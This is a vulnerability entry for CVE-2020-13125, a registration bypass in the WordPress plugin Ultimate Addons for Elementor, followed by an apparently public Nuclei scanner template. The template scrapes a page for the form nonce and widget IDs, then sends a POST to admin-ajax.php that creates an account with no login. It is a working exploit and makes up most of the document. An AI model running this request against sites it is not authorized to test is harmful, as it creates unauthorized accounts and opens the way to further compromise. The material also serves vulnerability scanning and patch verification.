An issue was discovered in the "Ultimate Addons for Elementor" plugin before 1.24.2 for WordPress, as exploited in the wild in May 2020 in conjunction with CVE-2020-13126. Unauthenticated attackers can create users with the Subscriber role even if registration is disabled.
PoC代码[已公开]
id: CVE-2020-13125
info:
name: Ultimate Addons for Elementor <= 1.24.1 - Registration Bypass
author: daffainfo
severity: high
description: |
An issue was discovered in the "Ultimate Addons for Elementor" plugin before 1.24.2 for WordPress, as exploited in the wild in May 2020 in conjunction with CVE-2020-13126. Unauthenticated attackers can create users with the Subscriber role even if registration is disabled.
impact: |
Unauthenticated attackers can create user accounts with Subscriber role, potentially leading to further malicious activities or privilege escalation
remediation: |
Update to version 1.24.2 or later.
reference:
- https://www.wordfence.com/blog/2020/05/combined-attack-on-elementor-pro-and-ultimate-addons-for-elementor-puts-1-million-sites-at-risk/
- https://nvd.nist.gov/vuln/detail/CVE-2020-13125
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
cvss-score: 7.2
cve-id: CVE-2020-13125
epss-score: 0.21581
epss-percentile: 0.95531
cwe-id: NVD-CWE-noinfo
cpe: cpe:2.3:a:brainstormforce:ultimate_addons_for_elementor:*:*:*:*:*:wordpress:*:*
metadata:
max-request: 2
vendor: brainstormforce
product: ultimate_addons_for_elementor
framework: wordpress
tags: cve2020,cve,wp,wordpress,wp-plugin,brainstormforce,ultimate-addons-for-elementor,vkev
flow: |
http(1)
for (let widget_id of iterate(template.widgets_id)) {
set("widget_id", widget_id)
http(2)
}
variables:
username: "{{rand_base(6)}}"
password: "{{rand_base(8)}}"
firstname: "{{rand_base(5)}}"
lastname: "{{rand_base(5)}}"
email: "{{randstr}}@{{rand_base(5)}}.com"
http:
- method: GET
path:
- "{{BaseURL}}"
redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains_all(body, "uaelRegistration", "form_nonce")'
condition: and
internal: true
extractors:
- type: regex
name: form_nonce
part: body
group: 1
regex:
- ',"form_nonce":"([a-f0-9]+)"'
internal: true
- type: regex
name: post_id
part: body
group: 1
regex:
- '"post":{"id":([0-9]+),'
internal: true
- type: regex
name: widgets_id
part: body
group: 1
regex:
- 'elementor-widget-uael-registration-form" data-id="([a-f0-9]+)"'
internal: true
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=uael_register_user&nonce={{form_nonce}}&data[page_id]={{post_id}}&data[widget_id]={{widget_id}}&data[user_name]={{username}}&data[email]={{email}}&data[password]={{password}}&data[first_name]={{firstname}}&data[last_name]={{lastname}}&data[send_email]={{randstr}}&data[auto_login]=yes
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'successfully registered'
- type: word
part: content_type
words:
- 'application/json'
- type: status
status:
- 200
# digest: 4a0a00473045022100a277ad2c8f36ea79bbfdd5ba5af4ae952cd2baa534dba098f86c4f7c309ade6e022026c3e9bf5d19d0ee999c8bb2bfb082b447826dd79d01d71246f9e5ba1c0f3288:922c64590222798bb761d5b6d8e72950